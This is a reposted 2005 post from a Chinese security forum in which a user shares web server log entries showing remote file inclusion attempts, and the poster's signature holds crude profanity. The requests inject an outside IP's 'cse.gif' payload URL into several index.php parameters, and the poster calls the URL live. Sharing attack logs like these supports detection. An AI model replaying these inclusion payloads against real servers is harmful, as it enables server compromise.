[转载]PHP Command and Safemode

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9831
精华: 769
积分: 40413
阅读权限: 200
性别: 男
在线时间: 3977 小时
注册时间: 2004-7-4
最后登录: 2008-10-6

发短消息
加为好友
当前离线

楼主大中小发表于 2005-7-30 20:46 只看该作者

[转载]PHP Command and Safemode

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

looks like CSE exploit is circulating again...
found several queries today from server log
anyone confirms?

"GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
"GET /index.php?id=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035
"-" "Python-urllib/2.4"
"GET /index.php?action=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
"GET /index.php?include=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
"GET /index.php?site=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"

this url is hot and working right now so handle with care...

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。